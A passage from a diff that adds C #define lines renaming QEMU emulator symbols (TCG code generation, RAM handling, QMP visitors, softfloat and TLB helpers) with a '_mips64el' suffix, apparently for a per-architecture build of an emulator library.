+#define qemu_init_vcpu qemu_init_vcpu_mips64el +#define qemu_ld_helpers qemu_ld_helpers_mips64el +#define qemu_log_close qemu_log_close_mips64el +#define qemu_log_enabled qemu_log_enabled_mips64el +#define qemu_log_flush qemu_log_flush_mips64el +#define qemu_loglevel_mask qemu_loglevel_mask_mips64el +#define qemu_log_vprintf qemu_log_vprintf_mips64el +#define qemu_oom_check qemu_oom_check_mips64el +#define qemu_parse_fd qemu_parse_fd_mips64el +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_mips64el +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_mips64el +#define qemu_ram_alloc qemu_ram_alloc_mips64el +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_mips64el +#define qemu_ram_foreach_block qemu_ram_foreach_block_mips64el +#define qemu_ram_free qemu_ram_free_mips64el +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_mips64el +#define qemu_ram_ptr_length qemu_ram_ptr_length_mips64el +#define qemu_ram_remap qemu_ram_remap_mips64el +#define qemu_ram_setup_dump qemu_ram_setup_dump_mips64el +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_mips64el +#define qemu_real_host_page_size qemu_real_host_page_size_mips64el +#define qemu_st_helpers qemu_st_helpers_mips64el +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_mips64el +#define qemu_try_memalign qemu_try_memalign_mips64el +#define qentry_destroy qentry_destroy_mips64el +#define qerror_human qerror_human_mips64el +#define qerror_report qerror_report_mips64el +#define qerror_report_err qerror_report_err_mips64el +#define qfloat_destroy_obj qfloat_destroy_obj_mips64el +#define qfloat_from_double qfloat_from_double_mips64el +#define qfloat_get_double qfloat_get_double_mips64el +#define qfloat_type qfloat_type_mips64el +#define qint_destroy_obj qint_destroy_obj_mips64el +#define qint_from_int qint_from_int_mips64el +#define qint_get_int qint_get_int_mips64el +#define qint_type qint_type_mips64el +#define qlist_append_obj qlist_append_obj_mips64el +#define qlist_copy 
qlist_copy_mips64el +#define qlist_copy_elem qlist_copy_elem_mips64el +#define qlist_destroy_obj qlist_destroy_obj_mips64el +#define qlist_empty qlist_empty_mips64el +#define qlist_entry_obj qlist_entry_obj_mips64el +#define qlist_first qlist_first_mips64el +#define qlist_iter qlist_iter_mips64el +#define qlist_new qlist_new_mips64el +#define qlist_next qlist_next_mips64el +#define qlist_peek qlist_peek_mips64el +#define qlist_pop qlist_pop_mips64el +#define qlist_size qlist_size_mips64el +#define qlist_size_iter qlist_size_iter_mips64el +#define qlist_type qlist_type_mips64el +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_mips64el +#define qmp_input_end_list qmp_input_end_list_mips64el +#define qmp_input_end_struct qmp_input_end_struct_mips64el +#define qmp_input_get_next_type qmp_input_get_next_type_mips64el +#define qmp_input_get_object qmp_input_get_object_mips64el +#define qmp_input_get_visitor qmp_input_get_visitor_mips64el +#define qmp_input_next_list qmp_input_next_list_mips64el +#define qmp_input_optional qmp_input_optional_mips64el +#define qmp_input_pop qmp_input_pop_mips64el +#define qmp_input_push qmp_input_push_mips64el +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_mips64el +#define qmp_input_start_list qmp_input_start_list_mips64el +#define qmp_input_start_struct qmp_input_start_struct_mips64el +#define qmp_input_type_bool qmp_input_type_bool_mips64el +#define qmp_input_type_int qmp_input_type_int_mips64el +#define qmp_input_type_number qmp_input_type_number_mips64el +#define qmp_input_type_str qmp_input_type_str_mips64el +#define qmp_input_visitor_cleanup qmp_input_visitor_cleanup_mips64el +#define qmp_input_visitor_new qmp_input_visitor_new_mips64el +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_mips64el +#define qmp_output_add_obj qmp_output_add_obj_mips64el +#define qmp_output_end_list qmp_output_end_list_mips64el +#define qmp_output_end_struct qmp_output_end_struct_mips64el 
+#define qmp_output_first qmp_output_first_mips64el +#define qmp_output_get_qobject qmp_output_get_qobject_mips64el +#define qmp_output_get_visitor qmp_output_get_visitor_mips64el +#define qmp_output_last qmp_output_last_mips64el +#define qmp_output_next_list qmp_output_next_list_mips64el +#define qmp_output_pop qmp_output_pop_mips64el +#define qmp_output_push_obj qmp_output_push_obj_mips64el +#define qmp_output_start_list qmp_output_start_list_mips64el +#define qmp_output_start_struct qmp_output_start_struct_mips64el +#define qmp_output_type_bool qmp_output_type_bool_mips64el +#define qmp_output_type_int qmp_output_type_int_mips64el +#define qmp_output_type_number qmp_output_type_number_mips64el +#define qmp_output_type_str qmp_output_type_str_mips64el +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_mips64el +#define qmp_output_visitor_new qmp_output_visitor_new_mips64el +#define qobject_decref qobject_decref_mips64el +#define qobject_to_qbool qobject_to_qbool_mips64el +#define qobject_to_qdict qobject_to_qdict_mips64el +#define qobject_to_qfloat qobject_to_qfloat_mips64el +#define qobject_to_qint qobject_to_qint_mips64el +#define qobject_to_qlist qobject_to_qlist_mips64el +#define qobject_to_qstring qobject_to_qstring_mips64el +#define qobject_type qobject_type_mips64el +#define qstring_append qstring_append_mips64el +#define qstring_append_chr qstring_append_chr_mips64el +#define qstring_append_int qstring_append_int_mips64el +#define qstring_destroy_obj qstring_destroy_obj_mips64el +#define qstring_from_escaped_str qstring_from_escaped_str_mips64el +#define qstring_from_str qstring_from_str_mips64el +#define qstring_from_substr qstring_from_substr_mips64el +#define qstring_get_length qstring_get_length_mips64el +#define qstring_get_str qstring_get_str_mips64el +#define qstring_new qstring_new_mips64el +#define qstring_type qstring_type_mips64el +#define ram_block_add ram_block_add_mips64el +#define ram_size ram_size_mips64el +#define 
range_compare range_compare_mips64el +#define range_covers_byte range_covers_byte_mips64el +#define range_get_last range_get_last_mips64el +#define range_merge range_merge_mips64el +#define ranges_can_merge ranges_can_merge_mips64el +#define raw_read raw_read_mips64el +#define raw_write raw_write_mips64el +#define rcon rcon_mips64el +#define read_raw_cp_reg read_raw_cp_reg_mips64el +#define recip_estimate recip_estimate_mips64el +#define recip_sqrt_estimate recip_sqrt_estimate_mips64el +#define register_cp_regs_for_features register_cp_regs_for_features_mips64el +#define register_multipage register_multipage_mips64el +#define register_subpage register_subpage_mips64el +#define register_tm_clones register_tm_clones_mips64el +#define register_types_object register_types_object_mips64el +#define regnames regnames_mips64el +#define render_memory_region render_memory_region_mips64el +#define reset_all_temps reset_all_temps_mips64el +#define reset_temp reset_temp_mips64el +#define rol32 rol32_mips64el +#define rol64 rol64_mips64el +#define ror32 ror32_mips64el +#define ror64 ror64_mips64el +#define roundAndPackFloat128 roundAndPackFloat128_mips64el +#define roundAndPackFloat16 roundAndPackFloat16_mips64el +#define roundAndPackFloat32 roundAndPackFloat32_mips64el +#define roundAndPackFloat64 roundAndPackFloat64_mips64el +#define roundAndPackFloatx80 roundAndPackFloatx80_mips64el +#define roundAndPackInt32 roundAndPackInt32_mips64el +#define roundAndPackInt64 roundAndPackInt64_mips64el +#define roundAndPackUint64 roundAndPackUint64_mips64el +#define round_to_inf round_to_inf_mips64el +#define run_on_cpu run_on_cpu_mips64el +#define s0 s0_mips64el +#define S0 S0_mips64el +#define s1 s1_mips64el +#define S1 S1_mips64el +#define sa1100_initfn sa1100_initfn_mips64el +#define sa1110_initfn sa1110_initfn_mips64el +#define save_globals save_globals_mips64el +#define scr_write scr_write_mips64el +#define sctlr_write sctlr_write_mips64el +#define set_bit set_bit_mips64el +#define 
set_bits set_bits_mips64el +#define set_default_nan_mode set_default_nan_mode_mips64el +#define set_feature set_feature_mips64el +#define set_float_detect_tininess set_float_detect_tininess_mips64el +#define set_float_exception_flags set_float_exception_flags_mips64el +#define set_float_rounding_mode set_float_rounding_mode_mips64el +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_mips64el +#define set_flush_to_zero set_flush_to_zero_mips64el +#define set_swi_errno set_swi_errno_mips64el +#define sextract32 sextract32_mips64el +#define sextract64 sextract64_mips64el +#define shift128ExtraRightJamming shift128ExtraRightJamming_mips64el +#define shift128Right shift128Right_mips64el +#define shift128RightJamming shift128RightJamming_mips64el +#define shift32RightJamming shift32RightJamming_mips64el +#define shift64ExtraRightJamming shift64ExtraRightJamming_mips64el +#define shift64RightJamming shift64RightJamming_mips64el +#define shifter_out_im shifter_out_im_mips64el +#define shortShift128Left shortShift128Left_mips64el +#define shortShift192Left shortShift192Left_mips64el +#define simple_mpu_ap_bits simple_mpu_ap_bits_mips64el +#define size_code_gen_buffer size_code_gen_buffer_mips64el +#define softmmu_lock_user softmmu_lock_user_mips64el +#define softmmu_lock_user_string softmmu_lock_user_string_mips64el +#define softmmu_tget32 softmmu_tget32_mips64el +#define softmmu_tget8 softmmu_tget8_mips64el +#define softmmu_tput32 softmmu_tput32_mips64el +#define softmmu_unlock_user softmmu_unlock_user_mips64el +#define sort_constraints sort_constraints_mips64el +#define sp_el0_access sp_el0_access_mips64el +#define spsel_read spsel_read_mips64el +#define spsel_write spsel_write_mips64el +#define start_list start_list_mips64el +#define stb_p stb_p_mips64el +#define stb_phys stb_phys_mips64el +#define stl_be_p stl_be_p_mips64el +#define stl_be_phys stl_be_phys_mips64el +#define stl_he_p stl_he_p_mips64el +#define stl_le_p stl_le_p_mips64el +#define stl_le_phys 
stl_le_phys_mips64el +#define stl_phys stl_phys_mips64el +#define stl_phys_internal stl_phys_internal_mips64el +#define stl_phys_notdirty stl_phys_notdirty_mips64el +#define store_cpu_offset store_cpu_offset_mips64el +#define store_reg store_reg_mips64el +#define store_reg_bx store_reg_bx_mips64el +#define store_reg_from_load store_reg_from_load_mips64el +#define stq_be_p stq_be_p_mips64el +#define stq_be_phys stq_be_phys_mips64el +#define stq_he_p stq_he_p_mips64el +#define stq_le_p stq_le_p_mips64el +#define stq_le_phys stq_le_phys_mips64el +#define stq_phys stq_phys_mips64el +#define string_input_get_visitor string_input_get_visitor_mips64el +#define string_input_visitor_cleanup string_input_visitor_cleanup_mips64el +#define string_input_visitor_new string_input_visitor_new_mips64el +#define strongarm_cp_reginfo strongarm_cp_reginfo_mips64el +#define strstart strstart_mips64el +#define strtosz strtosz_mips64el +#define strtosz_suffix strtosz_suffix_mips64el +#define stw_be_p stw_be_p_mips64el +#define stw_be_phys stw_be_phys_mips64el +#define stw_he_p stw_he_p_mips64el +#define stw_le_p stw_le_p_mips64el +#define stw_le_phys stw_le_phys_mips64el +#define stw_phys stw_phys_mips64el +#define stw_phys_internal stw_phys_internal_mips64el +#define sub128 sub128_mips64el +#define sub16_sat sub16_sat_mips64el +#define sub16_usat sub16_usat_mips64el +#define sub192 sub192_mips64el +#define sub8_sat sub8_sat_mips64el +#define sub8_usat sub8_usat_mips64el +#define subFloat128Sigs subFloat128Sigs_mips64el +#define subFloat32Sigs subFloat32Sigs_mips64el +#define subFloat64Sigs subFloat64Sigs_mips64el +#define subFloatx80Sigs subFloatx80Sigs_mips64el +#define subpage_accepts subpage_accepts_mips64el +#define subpage_init subpage_init_mips64el +#define subpage_ops subpage_ops_mips64el +#define subpage_read subpage_read_mips64el +#define subpage_register subpage_register_mips64el +#define subpage_write subpage_write_mips64el +#define suffix_mul suffix_mul_mips64el +#define 
swap_commutative swap_commutative_mips64el +#define swap_commutative2 swap_commutative2_mips64el +#define switch_mode switch_mode_mips64el +#define switch_v7m_sp switch_v7m_sp_mips64el +#define syn_aa32_bkpt syn_aa32_bkpt_mips64el +#define syn_aa32_hvc syn_aa32_hvc_mips64el +#define syn_aa32_smc syn_aa32_smc_mips64el +#define syn_aa32_svc syn_aa32_svc_mips64el +#define syn_breakpoint syn_breakpoint_mips64el +#define sync_globals sync_globals_mips64el +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_mips64el +#define syn_cp14_rt_trap syn_cp14_rt_trap_mips64el +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_mips64el +#define syn_cp15_rt_trap syn_cp15_rt_trap_mips64el +#define syn_data_abort syn_data_abort_mips64el +#define syn_fp_access_trap syn_fp_access_trap_mips64el +#define syn_insn_abort syn_insn_abort_mips64el +#define syn_swstep syn_swstep_mips64el +#define syn_uncategorized syn_uncategorized_mips64el +#define syn_watchpoint syn_watchpoint_mips64el +#define syscall_err syscall_err_mips64el +#define system_bus_class_init system_bus_class_init_mips64el +#define system_bus_info system_bus_info_mips64el +#define t2ee_cp_reginfo t2ee_cp_reginfo_mips64el +#define table_logic_cc table_logic_cc_mips64el +#define target_parse_constraint target_parse_constraint_mips64el +#define target_words_bigendian target_words_bigendian_mips64el +#define tb_add_jump tb_add_jump_mips64el +#define tb_alloc tb_alloc_mips64el +#define tb_alloc_page tb_alloc_page_mips64el +#define tb_check_watchpoint tb_check_watchpoint_mips64el +#define tb_find_fast tb_find_fast_mips64el +#define tb_find_pc tb_find_pc_mips64el +#define tb_find_slow tb_find_slow_mips64el +#define tb_flush tb_flush_mips64el +#define tb_flush_jmp_cache tb_flush_jmp_cache_mips64el +#define tb_free tb_free_mips64el +#define tb_gen_code tb_gen_code_mips64el +#define tb_hash_remove tb_hash_remove_mips64el +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_mips64el +#define tb_invalidate_phys_page_range 
tb_invalidate_phys_page_range_mips64el +#define tb_invalidate_phys_range tb_invalidate_phys_range_mips64el +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_mips64el +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_mips64el +#define tb_jmp_remove tb_jmp_remove_mips64el +#define tb_link_page tb_link_page_mips64el +#define tb_page_remove tb_page_remove_mips64el +#define tb_phys_hash_func tb_phys_hash_func_mips64el +#define tb_phys_invalidate tb_phys_invalidate_mips64el +#define tb_reset_jump tb_reset_jump_mips64el +#define tb_set_jmp_target tb_set_jmp_target_mips64el +#define tcg_accel_class_init tcg_accel_class_init_mips64el +#define tcg_accel_type tcg_accel_type_mips64el +#define tcg_add_param_i32 tcg_add_param_i32_mips64el +#define tcg_add_param_i64 tcg_add_param_i64_mips64el +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_mips64el +#define tcg_allowed tcg_allowed_mips64el +#define tcg_canonicalize_memop tcg_canonicalize_memop_mips64el +#define tcg_commit tcg_commit_mips64el +#define tcg_cond_to_jcc tcg_cond_to_jcc_mips64el +#define tcg_constant_folding tcg_constant_folding_mips64el +#define tcg_const_i32 tcg_const_i32_mips64el +#define tcg_const_i64 tcg_const_i64_mips64el +#define tcg_const_local_i32 tcg_const_local_i32_mips64el +#define tcg_const_local_i64 tcg_const_local_i64_mips64el +#define tcg_context_init tcg_context_init_mips64el +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_mips64el +#define tcg_cpu_exec tcg_cpu_exec_mips64el +#define tcg_current_code_size tcg_current_code_size_mips64el +#define tcg_dump_info tcg_dump_info_mips64el +#define tcg_dump_ops tcg_dump_ops_mips64el +#define tcg_exec_all tcg_exec_all_mips64el +#define tcg_find_helper tcg_find_helper_mips64el +#define tcg_func_start tcg_func_start_mips64el +#define tcg_gen_abs_i32 tcg_gen_abs_i32_mips64el +#define tcg_gen_add2_i32 tcg_gen_add2_i32_mips64el +#define tcg_gen_add_i32 tcg_gen_add_i32_mips64el +#define tcg_gen_add_i64 tcg_gen_add_i64_mips64el 
+#define tcg_gen_addi_i32 tcg_gen_addi_i32_mips64el +#define tcg_gen_addi_i64 tcg_gen_addi_i64_mips64el +#define tcg_gen_andc_i32 tcg_gen_andc_i32_mips64el +#define tcg_gen_and_i32 tcg_gen_and_i32_mips64el +#define tcg_gen_and_i64 tcg_gen_and_i64_mips64el +#define tcg_gen_andi_i32 tcg_gen_andi_i32_mips64el +#define tcg_gen_andi_i64 tcg_gen_andi_i64_mips64el +#define tcg_gen_br tcg_gen_br_mips64el +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_mips64el +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_mips64el +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_mips64el +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_mips64el +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_mips64el +#define tcg_gen_callN tcg_gen_callN_mips64el +#define tcg_gen_code tcg_gen_code_mips64el +#define tcg_gen_code_common tcg_gen_code_common_mips64el +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_mips64el +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_mips64el +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_mips64el +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_mips64el +#define tcg_gen_exit_tb tcg_gen_exit_tb_mips64el +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_mips64el +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_mips64el +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_mips64el +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_mips64el +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_mips64el +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_mips64el +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_mips64el +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_mips64el +#define tcg_gen_goto_tb tcg_gen_goto_tb_mips64el +#define tcg_gen_ld_i32 tcg_gen_ld_i32_mips64el +#define tcg_gen_ld_i64 tcg_gen_ld_i64_mips64el +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_mips64el +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_mips64el +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_mips64el +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_mips64el +#define tcg_gen_mov_i32 
tcg_gen_mov_i32_mips64el +#define tcg_gen_mov_i64 tcg_gen_mov_i64_mips64el +#define tcg_gen_movi_i32 tcg_gen_movi_i32_mips64el +#define tcg_gen_movi_i64 tcg_gen_movi_i64_mips64el +#define tcg_gen_mul_i32 tcg_gen_mul_i32_mips64el +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_mips64el +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_mips64el +#define tcg_gen_neg_i32 tcg_gen_neg_i32_mips64el +#define tcg_gen_neg_i64 tcg_gen_neg_i64_mips64el +#define tcg_gen_not_i32 tcg_gen_not_i32_mips64el +#define tcg_gen_op0 tcg_gen_op0_mips64el +#define tcg_gen_op1i tcg_gen_op1i_mips64el +#define tcg_gen_op2_i32 tcg_gen_op2_i32_mips64el +#define tcg_gen_op2_i64 tcg_gen_op2_i64_mips64el +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_mips64el +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_mips64el +#define tcg_gen_op3_i32 tcg_gen_op3_i32_mips64el +#define tcg_gen_op3_i64 tcg_gen_op3_i64_mips64el +#define tcg_gen_op4_i32 tcg_gen_op4_i32_mips64el +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_mips64el +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_mips64el +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_mips64el +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_mips64el +#define tcg_gen_op6_i32 tcg_gen_op6_i32_mips64el +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_mips64el +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_mips64el +#define tcg_gen_orc_i32 tcg_gen_orc_i32_mips64el +#define tcg_gen_or_i32 tcg_gen_or_i32_mips64el +#define tcg_gen_or_i64 tcg_gen_or_i64_mips64el +#define tcg_gen_ori_i32 tcg_gen_ori_i32_mips64el +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_mips64el +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_mips64el +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_mips64el +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_mips64el +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_mips64el +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_mips64el +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_mips64el +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_mips64el +#define tcg_gen_sar_i32 tcg_gen_sar_i32_mips64el +#define 
tcg_gen_sari_i32 tcg_gen_sari_i32_mips64el +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_mips64el +#define tcg_gen_shl_i32 tcg_gen_shl_i32_mips64el +#define tcg_gen_shl_i64 tcg_gen_shl_i64_mips64el +#define tcg_gen_shli_i32 tcg_gen_shli_i32_mips64el +#define tcg_gen_shli_i64 tcg_gen_shli_i64_mips64el +#define tcg_gen_shr_i32 tcg_gen_shr_i32_mips64el +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_mips64el +#define tcg_gen_shr_i64 tcg_gen_shr_i64_mips64el +#define tcg_gen_shri_i32 tcg_gen_shri_i32_mips64el +#define tcg_gen_shri_i64 tcg_gen_shri_i64_mips64el +#define tcg_gen_st_i32 tcg_gen_st_i32_mips64el +#define tcg_gen_st_i64 tcg_gen_st_i64_mips64el +#define tcg_gen_sub_i32 tcg_gen_sub_i32_mips64el +#define tcg_gen_sub_i64 tcg_gen_sub_i64_mips64el +#define tcg_gen_subi_i32 tcg_gen_subi_i32_mips64el +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_mips64el +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_mips64el +#define tcg_gen_xor_i32 tcg_gen_xor_i32_mips64el +#define tcg_gen_xor_i64 tcg_gen_xor_i64_mips64el +#define tcg_gen_xori_i32 tcg_gen_xori_i32_mips64el +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_mips64el +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_mips64el +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_mips64el +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_mips64el +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_mips64el +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_mips64el +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_mips64el +#define tcg_global_reg_new_i64 tcg_global_reg_new_i64_mips64el +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_mips64el +#define tcg_handle_interrupt tcg_handle_interrupt_mips64el +#define tcg_init tcg_init_mips64el +#define tcg_invert_cond tcg_invert_cond_mips64el +#define tcg_la_bb_end tcg_la_bb_end_mips64el +#define tcg_la_br_end tcg_la_br_end_mips64el +#define tcg_la_func_end tcg_la_func_end_mips64el +#define tcg_liveness_analysis 
tcg_liveness_analysis_mips64el +#define tcg_malloc tcg_malloc_mips64el +#define tcg_malloc_internal tcg_malloc_internal_mips64el +#define tcg_op_defs_org tcg_op_defs_org_mips64el +#define tcg_opt_gen_mov tcg_opt_gen_mov_mips64el +#define tcg_opt_gen_movi tcg_opt_gen_movi_mips64el +#define tcg_optimize tcg_optimize_mips64el +#define tcg_out16 tcg_out16_mips64el +#define tcg_out32 tcg_out32_mips64el +#define tcg_out64 tcg_out64_mips64el +#define tcg_out8 tcg_out8_mips64el +#define tcg_out_addi tcg_out_addi_mips64el +#define tcg_out_branch tcg_out_branch_mips64el +#define tcg_out_brcond32 tcg_out_brcond32_mips64el +#define tcg_out_brcond64 tcg_out_brcond64_mips64el +#define tcg_out_bswap32 tcg_out_bswap32_mips64el +#define tcg_out_bswap64 tcg_out_bswap64_mips64el +#define tcg_out_call tcg_out_call_mips64el +#define tcg_out_cmp tcg_out_cmp_mips64el +#define tcg_out_ext16s tcg_out_ext16s_mips64el +#define tcg_out_ext16u tcg_out_ext16u_mips64el +#define tcg_out_ext32s tcg_out_ext32s_mips64el +#define tcg_out_ext32u tcg_out_ext32u_mips64el +#define tcg_out_ext8s tcg_out_ext8s_mips64el +#define tcg_out_ext8u tcg_out_ext8u_mips64el +#define tcg_out_jmp tcg_out_jmp_mips64el +#define tcg_out_jxx tcg_out_jxx_mips64el +#define tcg_out_label tcg_out_label_mips64el +#define tcg_out_ld tcg_out_ld_mips64el +#define tcg_out_modrm tcg_out_modrm_mips64el +#define tcg_out_modrm_offset tcg_out_modrm_offset_mips64el +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_mips64el +#define tcg_out_mov tcg_out_mov_mips64el +#define tcg_out_movcond32 tcg_out_movcond32_mips64el +#define tcg_out_movcond64 tcg_out_movcond64_mips64el +#define tcg_out_movi tcg_out_movi_mips64el +#define tcg_out_op tcg_out_op_mips64el +#define tcg_out_pop tcg_out_pop_mips64el +#define tcg_out_push tcg_out_push_mips64el +#define tcg_out_qemu_ld tcg_out_qemu_ld_mips64el +#define tcg_out_qemu_ld_direct tcg_out_qemu_ld_direct_mips64el +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_mips64el +#define 
tcg_out_qemu_st tcg_out_qemu_st_mips64el +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_mips64el +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_mips64el +#define tcg_out_reloc tcg_out_reloc_mips64el +#define tcg_out_rolw_8 tcg_out_rolw_8_mips64el +#define tcg_out_setcond32 tcg_out_setcond32_mips64el +#define tcg_out_setcond64 tcg_out_setcond64_mips64el +#define tcg_out_shifti tcg_out_shifti_mips64el +#define tcg_out_st tcg_out_st_mips64el +#define tcg_out_tb_finalize tcg_out_tb_finalize_mips64el +#define tcg_out_tb_init tcg_out_tb_init_mips64el +#define tcg_out_tlb_load tcg_out_tlb_load_mips64el +#define tcg_out_vex_modrm tcg_out_vex_modrm_mips64el +#define tcg_patch32 tcg_patch32_mips64el +#define tcg_patch8 tcg_patch8_mips64el +#define tcg_pcrel_diff tcg_pcrel_diff_mips64el +#define tcg_pool_reset tcg_pool_reset_mips64el +#define tcg_prologue_init tcg_prologue_init_mips64el +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_mips64el +#define tcg_reg_alloc tcg_reg_alloc_mips64el +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_mips64el +#define tcg_reg_alloc_call tcg_reg_alloc_call_mips64el +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_mips64el +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_mips64el +#define tcg_reg_alloc_op tcg_reg_alloc_op_mips64el +#define tcg_reg_alloc_start tcg_reg_alloc_start_mips64el +#define tcg_reg_free tcg_reg_free_mips64el +#define tcg_reg_sync tcg_reg_sync_mips64el +#define tcg_set_frame tcg_set_frame_mips64el +#define tcg_set_nop tcg_set_nop_mips64el +#define tcg_swap_cond tcg_swap_cond_mips64el +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_mips64el +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_mips64el +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_mips64el +#define tcg_target_const_match tcg_target_const_match_mips64el +#define tcg_target_init tcg_target_init_mips64el +#define tcg_target_qemu_prologue tcg_target_qemu_prologue_mips64el +#define 
tcg_target_reg_alloc_order tcg_target_reg_alloc_order_mips64el +#define tcg_temp_alloc tcg_temp_alloc_mips64el +#define tcg_temp_free_i32 tcg_temp_free_i32_mips64el +#define tcg_temp_free_i64 tcg_temp_free_i64_mips64el +#define tcg_temp_free_internal tcg_temp_free_internal_mips64el +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_mips64el +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_mips64el +#define tcg_temp_new_i32 tcg_temp_new_i32_mips64el +#define tcg_temp_new_i64 tcg_temp_new_i64_mips64el +#define tcg_temp_new_internal tcg_temp_new_internal_mips64el +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_mips64el +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_mips64el +#define tdb_hash tdb_hash_mips64el +#define teecr_write teecr_write_mips64el +#define teehbr_access teehbr_access_mips64el +#define temp_allocate_frame temp_allocate_frame_mips64el +#define temp_dead temp_dead_mips64el +#define temps_are_copies temps_are_copies_mips64el +#define temp_save temp_save_mips64el +#define temp_sync temp_sync_mips64el +#define tgen_arithi tgen_arithi_mips64el +#define tgen_arithr tgen_arithr_mips64el +#define thumb2_logic_op thumb2_logic_op_mips64el +#define ti925t_initfn ti925t_initfn_mips64el +#define tlb_add_large_page tlb_add_large_page_mips64el +#define tlb_flush_entry tlb_flush_entry_mips64el +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_mips64el +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_mips64el +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_mips64el +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_mips64el +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_mips64el +#define tlbi_aa64_va_write tlbi_aa64_va_write_mips64el +#define tlbiall_is_write tlbiall_is_write_mips64el +#define tlbiall_write tlbiall_write_mips64el +#define tlbiasid_is_write tlbiasid_is_write_mips64el +#define tlbiasid_write tlbiasid_write_mips64el +#define tlbimvaa_is_write tlbimvaa_is_write_mips64el +#define tlbimvaa_write 
